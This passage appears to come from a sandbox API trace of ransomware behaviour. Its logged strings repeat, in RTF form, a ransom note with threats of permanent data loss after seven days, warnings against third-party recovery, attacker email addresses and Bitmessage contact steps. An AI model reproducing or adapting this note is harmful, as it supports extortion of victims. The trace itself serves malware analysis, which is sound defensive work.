subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.792] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.792] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 